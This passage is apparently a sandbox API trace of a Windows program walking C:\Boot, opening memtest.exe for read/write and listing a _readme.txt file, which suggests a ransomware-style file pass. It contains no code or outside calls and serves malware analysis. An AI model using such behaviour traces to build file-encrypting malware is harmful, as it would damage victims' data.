FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1917720, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1917720, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0096.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330338 [0096.976] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.976] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.976] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19639e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19639e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0096.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0096.976] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.976] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.976] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1989b40, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1989b40, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0096.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.976] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0096.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.977] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0096.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0096.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.977] PathFindExtensionW (pszPath="C:\\Boot\\memtest.exe") returned=".exe" [0096.977] CreateFileW (lpFileName="C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.977] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0096.977] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19afca0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19afca0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0096.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.977] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x214) returned 0x32cef08 [0096.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd20 [0096.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330158 [0096.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330018 [0096.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fcd0 [0096.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330478 [0096.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fed8 [0096.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33307c0 [0096.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330770 [0096.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330900 [0096.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330860 [0096.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33302c0 [0096.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330720 [0096.978] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd48 [0096.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330310 | out: hHeap=0x630000) returned 1 [0096.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33300e0 | out: hHeap=0x630000) returned 1 [0096.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fe60 | out: hHeap=0x630000) returned 1 [0096.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fca8 | out: hHeap=0x630000) returned 1 [0096.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332ff28 | out: hHeap=0x630000) returned 1 [0096.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330748 | out: hHeap=0x630000) returned 1 [0096.978] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330888 | out: hHeap=0x630000) returned 1 [0096.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33301f8 | out: hHeap=0x630000) returned 1 [0096.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33304c8 | out: hHeap=0x630000) returned 1 [0096.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0096.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330338 | out: hHeap=0x630000) returned 1 [0096.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330608 | out: hHeap=0x630000) returned 1 [0096.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0096.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b94968 | out: hHeap=0x630000) returned 1 [0096.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330180 [0096.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.979] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19fbf60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19fbf60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0096.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0096.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.979] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa19fbf60, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa19fbf60, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0096.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330338 [0096.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.979] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.979] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a220c0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a220c0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0096.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.979] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0096.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.980] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a48220, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a48220, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0096.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33304c8 [0096.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.980] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a6e380, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a6e380, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0096.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33301f8 [0096.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.980] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.980] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a6e380, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a6e380, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0096.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x310) returned 0x694598 [0096.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330888 [0096.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330748 [0096.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff28 [0096.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fca8 [0096.980] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fe60 [0096.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33300e0 [0096.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330310 [0096.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330298 [0096.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330838 [0096.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33304f0 [0096.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff78 [0096.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd70 [0096.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330590 [0096.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332ff50 [0096.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33307e8 [0096.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330658 [0096.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fe10 [0096.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33306f8 [0096.981] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33304a0 [0096.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd20 | out: hHeap=0x630000) returned 1 [0096.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330158 | out: hHeap=0x630000) returned 1 [0096.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330018 | out: hHeap=0x630000) returned 1 [0096.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fcd0 | out: hHeap=0x630000) returned 1 [0096.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330478 | out: hHeap=0x630000) returned 1 [0096.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fed8 | out: hHeap=0x630000) returned 1 [0096.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33307c0 | out: hHeap=0x630000) returned 1 [0096.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330770 | out: hHeap=0x630000) returned 1 [0096.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330900 | out: hHeap=0x630000) returned 1 [0096.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330860 | out: hHeap=0x630000) returned 1 [0096.981] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33302c0 | out: hHeap=0x630000) returned 1 [0096.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330720 | out: hHeap=0x630000) returned 1 [0096.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd48 | out: hHeap=0x630000) returned 1 [0096.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0096.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330608 | out: hHeap=0x630000) returned 1 [0096.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330338 | out: hHeap=0x630000) returned 1 [0096.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330630 | out: hHeap=0x630000) returned 1 [0096.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33304c8 | out: hHeap=0x630000) returned 1 [0096.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33301f8 | out: hHeap=0x630000) returned 1 [0096.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0096.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33301f8 [0096.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.982] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1a944e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1a944e0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0096.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x33304c8 [0096.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.982] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.982] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1aba640, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1aba640, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0096.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.982] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330630 [0096.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.983] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1ae07a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1ae07a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0096.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330338 [0096.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.983] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa1b06900, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1b06900, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0096.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332f8e8 [0096.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330608 [0096.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.983] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa17023e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa17023e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1728540, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0096.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.983] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33173a0 [0096.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.983] PathFindExtensionW (pszPath="C:\\Boot\\_readme.txt") returned=".txt" [0096.983] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33173a0 | out: hHeap=0x630000) returned 1 [0096.983] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa17023e0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa17023e0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa1728540, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0096.984] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0096.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330220 | out: hHeap=0x630000) returned 1 [0096.984] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0096.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330220 [0096.984] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0096.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0096.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0096.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) 